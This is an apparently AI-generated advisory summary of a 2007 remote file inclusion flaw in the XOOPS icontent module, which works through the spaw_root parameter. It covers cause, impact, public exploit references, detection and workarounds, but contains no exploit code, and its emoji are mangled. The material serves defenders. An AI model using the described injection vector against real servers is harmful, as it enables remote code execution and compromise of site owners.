This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: Remote File Inclusion (RFI) in XOOPS icontent. π **Consequences**: Attackers inject malicious PHP code via the `spaw_root` parameter, leading to **Remote Code Execution (RCE)** on the server.β¦
π οΈ **Root Cause**: Flawed input validation in `include/wysiwyg/spaw_control.class.php`. π« The application blindly includes files based on the `spaw_root` URL parameter without sanitization.β¦
π― **Affected**: XOOPS icontent module. π¦ **Component**: `spaw_control.class.php`. π **Timeline**: Published June 6, 2007. π **Scope**: Any instance running this specific module version with the vulnerable file present.
Q4What can hackers do? (Privileges/Data)
π **Privileges**: Full Remote Code Execution. π **Data**: Attackers can read/write any file accessible to the web server process. πΈοΈ **Impact**: Can install backdoors, deface sites, or pivot to internal networks.β¦
π **Auth**: Likely **No Authentication** required for the initial inclusion vector. π **Config**: Requires the vulnerable module to be installed and accessible. π **Threshold**: **Low**.β¦
π₯ **Public Exploit**: **YES**. π **Sources**: Exploit-DB #4022, Milw0rm, Secunia Advisory 25522. π§ **Proof**: Mailing list posts from June 2007 confirm active exploitation. π― Wild exploitation is highly probable.
Q7How to self-check? (Features/Scanning)
π **Check**: Scan for `spaw_control.class.php` in web roots. π§ͺ **Test**: Look for `spaw_root` parameter in HTTP requests. π‘ **Tools**: Use WAF logs or vulnerability scanners to detect RFI patterns targeting this file.β¦
π‘οΈ **Official Fix**: Data implies it's a known issue (duplicate of CVE-2006-4656). π **Status**: Legacy vulnerability (2007). π **Action**: Update XOOPS/icontent to the latest patched version if available.β¦
π§ **Workaround**: Remove or disable the `icontent` module. π **Block**: Use WAF/IPS to block requests containing `spaw_root` with external URLs.β¦
β‘ **Priority**: **CRITICAL** for legacy systems. π **Urgency**: High if the system is still online. π **Context**: Old vuln, but RFI is deadly. π¨ **Advice**: Patch immediately or isolate the server.β¦